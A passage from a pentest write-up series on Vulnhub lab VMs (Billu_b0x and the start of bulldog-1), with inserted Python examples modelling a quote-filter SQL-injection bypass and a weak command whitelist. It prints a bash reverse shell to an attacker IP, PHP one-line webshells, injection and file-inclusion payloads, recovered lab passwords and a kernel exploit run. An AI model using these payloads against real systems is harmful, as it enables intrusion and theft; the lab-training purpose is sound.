'></a>Difficulties and pitfalls</h3><p>(1) Exporting the SSL key with keytool is unusual in a pentest; reading up on the principle and the tool took a lot of time.</p><p>(2) After getting a shell from Tomcat, the uploaded caidao shell kept being removed within minutes. It looked like anti-virus or a webshell cleaner, but it was the host's tidyup.sh running every 3 minutes. A reverse shell gives a persistent session instead.</p><p>(3) MySQL commands gave no output: caidao timed out and in nc the result only appeared on exit. Just before giving up, typing exit made the output appear and revealed milton's password hash. Just when the road seemed to end, a way opened.</p><p>(4) Two account switches and then a root reverse shell took considerable time; finding and exploiting tidyup.sh was the bulk of it.</p><p>(5) Getting a root reverse shell through a cron job is common in real-world pentests, e.g. an unauthenticated Redis running as root (the classic cryptomining vector), abused either to plant an SSH key or to write a root crontab that calls back. It was a first on Vulnhub, though, and is hard for beginners.</p><h1><a name='header-n7424' class='md-header-anchor '></a>Section 2: Billu_b0x</h1><h2><a name='header-n7425' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n7426' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/billu/Billu_b0x.zip' target='_blank' class='url'>https://download.vulnhub.com/billu/Billu_b0x.zip</a></p><h3><a name='header-n7429' class='md-header-anchor 
'></a>Target description</h3><p>A medium-difficulty VM running 32-bit Ubuntu; other packages: </p><ul><li>PHP</li><li>apache</li><li>MySQL</li></ul><h3><a name='header-n7442' class='md-header-anchor '></a>Goal</h3><p>Boot to root: get into the VM through the web application and obtain root.</p><h3><a name='header-n7445' class='md-header-anchor '></a>Environment</h3><ul><li>Target: open the VM in VMware with the network set to NAT; the target picks up an IP automatically.</li><li>Attack machines: a Windows attack machine on the same subnet with Nmap, Burp Suite, sqlmap, nc, Python 2.7, DirBuster, AWVS, Nessus and other tools, plus a Kali attack machine; the Windows machine was used for most of the work.</li></ul><h2><a name='header-n7453' class='md-header-anchor '></a>Reconnaissance</h2><ul><li>Host discovery</li></ul><p>Boot the Billu_b0x VM. Since the network is NAT, sweep the /24 of the VMware Network Adapter VMnet8 NAT subnet with Nmap to find the VM's IP:</p><p><code>nmap -sP 192.168.64.1/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The target IP is <code>192.168.64.161</code></p><ul><li>Port and service identification</li></ul><p>Scan all 65535 ports with nmap, with service detection and the aggressive scan (-A), saving the result to a text file:</p><p><code>nmap -p1-65535 -A 192.168.64.161 -oN billu.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Open ports and services:</p><table><thead><tr><th>Port</th><th>Protocol</th><th>Service</th></tr></thead><tbody><tr><td>TCP 22</td><td>SSH</td><td>OpenSSH 5.9p1</td></tr><tr><td>TCP 80</td><td>HTTP</td><td>Apache httpd 2.2.22</td></tr></tbody></table><p>The web home page shows a username/password form with the hint "Show me your SQLI skills".</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7488' class='md-header-anchor '></a>Vulnerability discovery</h2><ul><li>Approach:</li></ul><p>(1) SQL injection: the home page invites injection; find a way to make it work.</p><p>(2) Directory brute force with DirBuster to find new pages and new bugs;</p><p>(3) Vulnerability scanning: feed the discovered pages to AWVS or AppScan;</p><p>(4) Manual testing: browse the discovered pages through Firefox with Burp as proxy and inspect the requests and responses by hand;</p><p>(5) Read the source of every page for hints;</p><p>(6) If a username and password turn up, try SSH; a working SSH login removes the need for a reverse shell.</p><ul><li>Step 1: test the home page for SQL injection</li></ul><p>(1) Entering <code>admin' or 'a'='a --</code> as the username with any password does not work; a JavaScript alert says Try again:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Test the POST form with sqlmap:</p><p>sqlmap.py -u "<a href='http://192.168.64.161' target='_blank' class='url'>http://192.168.64.161</a>" --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>sqlmap finishes without finding an injection. The filtering rule is unknown at this point and a few sqlmap tampers do not help either, so park the injection fuzzing and brute-force directories first.</p><ul><li>Step 2: run DirBuster on Windows and dirb on Kali Linux at the same time, to get more results in less time:</li></ul><p>This yields quite a few pages, test.php, add.php, in.php, c.php, index.php, show.php and others, plus the directories uploaded_images and phpmy. Visit each:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 3: use the file inclusion bug to read PHP source and the passwd file</li></ul><p>(1) test.php complains that the file parameter is empty and must be supplied.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Test file inclusion with <code>http://192.168.64.161/test.php?file=/etc/passwd</code>: nothing is included and the page redirects to the home page.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) In Firefox's HackBar or in Burp Suite, change the GET request to a POST; the inclusion then works and returns the passwd file.</p><p>Posting the data with HackBar downloads the passwd file:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>In Burp Suite, use Change request method to turn the GET into a POST; the passwd file comes back:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Using the same file inclusion, download add.php, in.php, c.php, index.php, show.php, panel.php and the rest, so that each page can be audited while it is being explored.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) The passwd file shows one account with UID 1000, ica, so the SSH usernames to try are ica and root:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 4: visit add.php and in.php and audit the code</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>add.php is an upload form, but it does nothing: the source is only the form, with no server-side handler. in.php is phpinfo output.</p><ul><li>Step 5: read c.php</li></ul><p>This is the database connection file and holds the MySQL credentials:</p><p>Username: billu</p><p>Password: b0x_billu</p><p>Database: ica_lab</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 6: logging in to phpMyAdmin with the MySQL password fails</li></ul><p>(1) dirb found the /phpmy directory, which is a phpMyAdmin login page:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Logging in to phpMyAdmin with the MySQL credentials fails. At this point there is one SSH user, ica, and the MySQL account billu / b0x_billu, but neither SSH nor phpMyAdmin accepts them.</p><p>So the SQL injection bypass has not worked and the recovered MySQL password does not open phpMyAdmin.</p><p>Tentative conclusion: the VM is faulty and MySQL is not running; plan to boot Ubuntu in single-user mode later to check.</p><ul><li>Step 7: keep brute-forcing the phpmy directory and include the phpMyAdmin configuration file</li></ul><p>(1) phpMyAdmin's default configuration file is config.inc.php. The path has to be guessed; judging by the URL, it sits under /var/www/phpmy.</p><p>(2) Read config.inc.php through the file inclusion, in Firefox's HackBar or in Burp Suite. With HackBar:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The configuration file contains the root password: roottoor</p><p>(3) With Burp Suite:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 8: log in as root over SSH with Xshell; the exercise is complete</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 9: diagnose the MySQL fault</li></ul><p>Root is in hand, but the earlier phpMyAdmin login failure pointed at MySQL. As root, the service status reads mysql stop/waiting. Presumably the heavily threaded directory brute force and scanning knocked MySQL over; restarting it failed, so the VM was reinstalled.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>After the reinstall, SSH in and check: MySQL is running normally, but the new VM has the IP 192.168.64.162.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 10: back to step 6, log in to phpMyAdmin with the MySQL password</li></ul><p>Username billu, password b0x_billu: login succeeds.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The auth table in the <code>ica_lab</code> database holds the web login: username biLLu, password hEx_it.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/26.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7650' class='md-header-anchor '></a>Getting a shell</h2><ul><li>Step 11: log in to the index page, get command execution and a reverse shell</li></ul><p>(1) Log in to the home page with the web credentials; the case must match exactly.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/27.jpg' alt='' referrerPolicy='no-referrer' 
/></p><p>After login there is an account management page. The two accounts are the two captains from Pirates of the Caribbean, Jack Sparrow and Captain Barbossa. As an aside, Barbossa is the better character: a pirate friend who behaves like an enemy, witty, brave, cunning, ambitious and calculating.</p><p>The avatars of the two accounts live in the directory found earlier: <code>http://192.168.64.162/uploaded_images/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Click add user to reach the add-account form, which includes an image upload; the plan is to combine the upload with the file inclusion to get a shell.</p><p>The panel.php source obtained earlier through the test.php inclusion shows that panel.php has a local file inclusion bug of its own:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Download one of the images from <code>http://192.168.64.162/uploaded_images/</code>, jack.php, open it in a text editor, add the one-line command shell <code>&lt;?php system($_GET['cmd']); ?&gt;</code> in the middle or at the end of the file, and upload it. The upload succeeds.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Execute commands through Burp. Put the command in the URL of the POST request: <code>POST /panel.php?cmd=cat%20/etc/passwd;ls</code></p><p>and include the image shell cmd.jpg in the POST body: <code>load=/uploaded_images/cmd.jpg&continue=continue</code></p><p>The command <code>cat /etc/passwd;ls</code> runs:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Reverse shell with bash</p><p>Command: echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash</p><p>The command must be URL-encoded:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Send it in the URL of the POST:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc receives the reverse shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 12: find a writable directory and drop a caidao shell</li></ul><p>The upload directory uploaded_images is writable; change into it and write a caidao shell: <code>echo '&lt;?php eval($_POST['123456']);?&gt;' >> 
caidao.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>caidao connects, which makes file transfer convenient.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7712' class='md-header-anchor '></a>Privilege escalation</h2><ul><li>Step 13: check the kernel and OS version and look for a privilege escalation exploit</li></ul><p>(1) Check the kernel and distribution version with <code>uname -a</code> and <code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Download the well-known Ubuntu local privilege escalation exploit (overlayfs, CVE-2015-1328):</p><p><code>https://www.exploit-db.com/exploits/37292/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 14: compile and escalate</li></ul><p>(1) Set permissions on the source (not strictly needed: only the compiled binary has to be executable) </p><p><code>chmod 777 37292.c</code></p><p>(2) Compile the exploit</p><p><code>gcc 37292.c -o exp</code></p><p>(3) Run the exploit to become root</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7744' class='md-header-anchor '></a>Takeaways</h2><h3><a name='header-n7746' class='md-header-anchor '></a>Other routes</h3><p>There are three normal routes in.</p><p>Route 1: craft the injection. Use the test.php inclusion to obtain the index.php source, read the SQL filtering logic there, craft an injection that defeats it, log in, get a shell and escalate.</p><p>(1) Auditing index.php shows the following filter:</p><p><code>$uname=str_replace('\'','',urldecode($_POST['un']));</code></p><p><code>$pass=str_replace('\'','',urldecode($_POST['ps']));</code></p><p>str_replace removes every single quote from the input (<code>'\''</code> is PHP's escaped single quote), and urldecode runs first, so a quote cannot be smuggled in by URL-encoding it. What the filter leaves alone is the backslash: a trailing <code>\</code> escapes the closing quote that the query appends, which shifts the string boundary and lets the rest of the payload run as SQL.</p><p>(2) The common login payload <code>' or 1=1 -- </code> is therefore extended with <code>\'</code> at the end; str_replace strips the quotes and leaves the backslash in place.</p><p>Tested with an online PHP debugger:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) The injection works with the payload <code>' or 1=1 -- \'</code>, which the filter turns into <code> or 1=1 -- \</code>:</p><p><img 
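hidden alt='' /></p>

<p>Added example (Python, not from the writeup): a small model of the index.php filter and of MySQL's string-literal rules, showing exactly why <code>' or 1=1 -- \'</code> works when <code>' or 1=1 -- </code> does not. The two str_replace lines are the page's; the query shape (<code>pass='...' and uname='...'</code>) is an assumption, since the page does not show it, and the same bypass works whichever field comes first. One consequence the model makes visible: the payload has to go into both fields, because with the backslash in only one of them the escaped quote leaves a string literal unterminated and MySQL rejects the statement.</p>

```python
"""Why the str_replace quote filter in Billu_b0x's index.php is bypassable.

Added example. Only the two str_replace lines come from the writeup; the query
shape used here (pass='...' and uname='...') is an assumption, and the bypass
below works whichever field the real query puts first.
"""
from urllib.parse import unquote

NAIVE_PAYLOAD = "' or 1=1 -- "        # textbook login bypass: stripped to harmless text
WRITEUP_PAYLOAD = "' or 1=1 -- \\'"   # the page's payload: the backslash survives


def php_filter(value: str) -> str:
    """Emulate str_replace('\\'', '', urldecode($_POST[...])).

    PHP's '\\'' is a single quote, so every quote is removed and nothing else
    is touched; urldecode runs first, so %27 is decoded and removed as well.
    """
    return unquote(value).replace("'", "")


def build_query(uname: str, pass_: str) -> str:
    """Assumed query construction (the page does not show this line)."""
    return "select * from auth where pass='" + pass_ + "' and uname='" + uname + "'"


def login_query(posted_uname: str, posted_pass: str) -> str:
    return build_query(php_filter(posted_uname), php_filter(posted_pass))


def split_literals(sql: str):
    """Tokenise a statement into ('sql', text), ('str', literal), ('comment', text).

    Follows MySQL's default rules: inside a single-quoted literal a backslash
    escapes the next character, '' is a literal quote, and '-- ' or '#' outside
    a literal comments out the rest of the line.
    """
    parts, buf, i, in_str = [], [], 0, False
    n = len(sql)
    while i < n:
        c = sql[i]
        if in_str:
            if c == "\\" and i + 1 < n:          # \' stays inside the literal
                buf.append(sql[i + 1])
                i += 2
            elif c == "'" and i + 1 < n and sql[i + 1] == "'":
                buf.append("'")
                i += 2
            elif c == "'":
                parts.append(("str", "".join(buf)))
                buf, in_str = [], False
                i += 1
            else:
                buf.append(c)
                i += 1
            continue
        if sql.startswith("-- ", i) or c == "#":
            if buf:
                parts.append(("sql", "".join(buf)))
            parts.append(("comment", sql[i:]))
            return parts
        if c == "'":
            if buf:
                parts.append(("sql", "".join(buf)))
            buf, in_str = [], True
            i += 1
            continue
        buf.append(c)
        i += 1
    if in_str:
        raise ValueError("unterminated string literal: " + "".join(buf))
    if buf:
        parts.append(("sql", "".join(buf)))
    return parts


def query_parses(sql: str) -> bool:
    """False when MySQL would reject the statement for an unterminated literal."""
    try:
        split_literals(sql)
        return True
    except ValueError:
        return False


def effective_condition(sql: str) -> str:
    """The SQL MySQL actually evaluates, with every literal collapsed to {str}."""
    out = []
    for kind, text in split_literals(sql):
        if kind == "str":
            out.append("{str}")
        elif kind == "sql":
            out.append(text)
    return "".join(out).strip()


if __name__ == "__main__":
    for label, payload in (("naive", NAIVE_PAYLOAD), ("writeup", WRITEUP_PAYLOAD)):
        q = login_query(payload, payload)
        print(f"{label}: {q}\n  -> {effective_condition(q)}")
    print("payload in one field only parses:", query_parses(login_query(WRITEUP_PAYLOAD, "x")))
```

<p>The defence is equally visible in the model: removing quotes while leaving backslashes is not escaping. Prepared statements, or failing that mysqli_real_escape_string, handle both characters; a str_replace never will.</p>

<p><img 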
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p>From there, getting a shell is the same as above.</p><p>Route 2: brute-force phpMyAdmin, read the MySQL password from c.php through the file inclusion, log in to phpMyAdmin and get a shell from there.</p><p>Route 3: include every readable configuration file, take the root password from the phpMyAdmin configuration and log in over SSH. This route works even with MySQL down.</p><ul><li>Pitfalls</li></ul><p>(1) MySQL crashed under the heavily threaded directory brute force and injection testing, so phpMyAdmin rejected the correct password and a lot of time was lost. An accidental fault: two directory brute-forcers plus sqlmap running at once with too many threads killed MySQL.</p><p>(2) For the test.php inclusion, when GET fails try POST. Once the inclusion works, pull down every page's source and audit it.</p><p>(3) The index.php injection consumed a lot of time; in hindsight it was not needed, since logging in through phpMyAdmin sidesteps it.</p><p>(4) The panel.php inclusion is easy to miss without a careful read of the source. The test.php inclusion could not be made to trigger the shell.</p><p>(5) Upload plus inclusion is a standard way to get a shell on these targets; with both bugs present it is quick.</p><p>(6) For escalation, look at the main configuration files, database connection files and user files, or use a known Ubuntu local exploit.</p><h1><a name='header-n7794' class='md-header-anchor '></a>Section 3: bulldog-1</h1><h2><a name='header-n7795' class='md-header-anchor '></a>Target information</h2><pre class="md-fences md-end-block" lang="">Author: 紅日安全 (Red Sun Security Team)
First published on Anquanke: https://www.anquanke.com/post/id/106459</pre><h3><a name='header-n7797' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/bulldog/bulldog.ova' target='_blank' class='url'>https://download.vulnhub.com/bulldog/bulldog.ova</a></p><h3><a name='header-n7800' class='md-header-anchor '></a>Target description</h3><p>Bulldog Industries recently had its website defaced by the malicious German Shepherd Hack Team. Does this mean there are more vulnerabilities to exploit? Why don't you find out? :)</p><p>This is a standard Boot-to-Root; the goal is to get into the root directory and see the congratulatory message.</p><h3><a name='header-n7805' class='md-header-anchor '></a>Goal</h3><p>Obtain root and the flag.</p><h3><a name='header-n7808' class='md-header-anchor '></a>Environment</h3><ul><li>Target: started in VirtualBox from the imported image, with the network bridged to the wireless adapter; on boot it picks up the IP 172.20.10.7.</li><li>Windows attack machine: the physical host on the wireless network, IP 172.20.10.5, with Burp Suite, nc, Python 2.7, DirBuster and other tools.</li><li>Kali attack machine: a VMware VM bridged to the wireless adapter, IP 172.20.10.6. Either attack machine will do.</li></ul><h2><a name='header-n7819' class='md-header-anchor '></a>Reconnaissance</h2><ul><li>Host discovery</li></ul><p>The target prints its IP on the console once it has booted: 172.20.10.7. No Nmap sweep of the /24 is needed.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port and service identification</li></ul><p>Scan all 65535 ports with nmap, with service fingerprinting, and save the result to a text file:</p><p><code>nmap -p1-65535 -A 172.20.10.7 -oN bulldog.txt</code></p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>Open ports and services:</p><table><thead><tr><th>Port</th><th>Protocol</th><th>Service</th></tr></thead><tbody><tr><td>TCP 23</td><td>SSH</td><td>OpenSSH 7.2p2</td></tr><tr><td>TCP 80</td><td>HTTP</td><td>WSGIServer Python 2.7.12</td></tr><tr><td>TCP 8080</td><td>HTTP</td><td>WSGIServer Python 2.7.12</td></tr></tbody></table><p>Operating system: Linux 3.2-4.9</p><h2><a name='header-n7850' class='md-header-anchor '></a>Vulnerability discovery</h2><ul><li>Web approach:</li></ul><p>(1) Read the source of every page for hints;</p><p>(2) Brute-force directories with DirBuster and look for bugs in any new pages;</p><p>(3) Look for injection or framework bugs: with input fields or URL parameters, scan for injection with AWVS; if the site runs on a CMS or framework, only its known vulnerabilities apply and scanners rarely find injection.</p><ul><li>SSH approach:</li></ul><p>(1) With a username in hand, Hydra or Medusa can brute-force weak passwords, given a good wordlist and a weak password to find.</p><p>(2) With web admin or system credentials, try SSH; a working login removes the need for a reverse shell.</p><ul><li>Step 1: browse the site and brute-force directories</li></ul><p>(1) Visit <code>http://172.20.10.7/</code>:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><p>The home page links to a notice page; nothing of value there.</p><p>(2) DirBuster finds the dev and admin directories:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) <code>http://172.20.10.7/admin</code> is a Django admin login. A few common weak passwords fail; leave brute force for later and look at the other pages first.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) <code>http://172.20.10.7/dev</code> is rich in useful information:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><p>The new system no longer uses PHP or any CMS; it is built on Django. That makes a classic web injection unlikely, leaving only Django framework bugs, and there is no point hunting PHP bugs or writing PHP webshells.</p><p>The new system is managed through a web shell: there is a Web-shell link to <code>http://172.20.10.7/dev/shell/</code>, but it requires authentication.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 2: crack the hashes</li></ul><p>(1) 
The source of <code>http://172.20.10.7/dev</code> contains the e-mail address and a hash for every Team Lead:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>There is also an explicit note: We'll remove these in prod. It's not like a hacker can do anything with a hash.</p><p>(2) The hashes are 40 hex characters, i.e. SHA-1. Even without recognising the type, each hash can be submitted to CMD5 for a lookup:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) Two of them resolve:</p><p>Back End: <a href='mailto:nick@bulldogindustries.com' target='_blank' class='url'>nick@bulldogindustries.com</a></p><p>Username nick, password bulldog (CMD5 returns it for free)</p><p>Database: <a href='mailto:sarah@bulldogindustries.com' target='_blank' class='url'>sarah@bulldogindustries.com</a></p><p>Username sarah, password bulldoglover (CMD5 charges for this one)</p><ul><li>Step 3: log in to the admin site</li></ul><p>(1) The cracked passwords fail against SSH on port 23:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/10.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) sarah / bulldoglover logs in to the admin site, but the account has no edit rights.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) Revisiting the web shell page now succeeds, since the session is authenticated; it is a command execution interface:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7938' class='md-header-anchor '></a>Getting a shell</h2><ul><li>Step 4: bypass the whitelist and run arbitrary commands: </li></ul><p>The web shell only accepts whitelisted commands. Try chaining commands with ; or &&:</p><p>ls is whitelisted and id is not, yet <code>ls && id</code> runs id, so the whitelist only checks the first command of the chain and the rest reaches the shell unfiltered.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 5: reverse shell: </li></ul><p>(1) Start an nc listener on the Windows attack machine: <code>nc -lvnp 4444</code></p><p><img 
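hidden alt='' /></p>

<p>Added example (Python, not the Bulldog application's code, which the writeup does not show): an illustrative first-token whitelist that behaves like the one observed in step 4, beside a hardened version. The weak check looks only at the first word and then hands the whole line to a shell, so <code>ls && id</code> is "ls" as far as the check is concerned; the strict version refuses shell metacharacters, tokenises with <code>shlex</code>, checks argv[0] against the whitelist and runs the argv list without any shell.</p>

```python
"""First-token command whitelists and why `ls && id` slips through.

Added example: these checks are illustrative reimplementations, not the Bulldog
web shell's code, which the writeup does not show. The weak version mirrors the
observed behaviour (the first word decides; the rest of the line rides along
into a shell); the strict version never hands the string to a shell at all.
"""
import re
import shlex
import subprocess

APPROVED = {"ls", "pwd", "echo", "whoami", "cat", "uname"}

# Anything that lets a shell chain, substitute, redirect or glob.
SHELL_METACHARS = re.compile(r"[;&|`$(){}<>\n\\*?~\[\]]")


def naive_is_allowed(command: str) -> bool:
    """Vulnerable: only the first word is checked."""
    first = command.strip().split(" ")[0]
    return first in APPROVED


def naive_run(command: str):
    """Vulnerable: the whole line reaches /bin/sh, so `ls && id` runs id too."""
    if not naive_is_allowed(command):
        return None
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def strict_parse(command: str):
    """Hardened: reject metacharacters, tokenise with shlex, whitelist argv[0]."""
    if SHELL_METACHARS.search(command):
        return None
    try:
        argv = shlex.split(command)
    except ValueError:          # unbalanced quotes
        return None
    if not argv or argv[0] not in APPROVED:
        return None
    return argv


def strict_run(command: str):
    """Hardened: an argv list and no shell, so there is nothing left to chain."""
    argv = strict_parse(command)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for cmd in ("ls", "id", "ls && id", "echo $(id)"):
        print(f"{cmd!r:14} naive={naive_is_allowed(cmd)!s:5} strict={strict_parse(cmd)}")
```

<p>Even the strict version still trusts the whitelisted binaries themselves: <code>cat /etc/shadow</code> passes the parser, so the allowed commands need argument restrictions of their own, and the process should run as an unprivileged user.</p>

<p><img 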
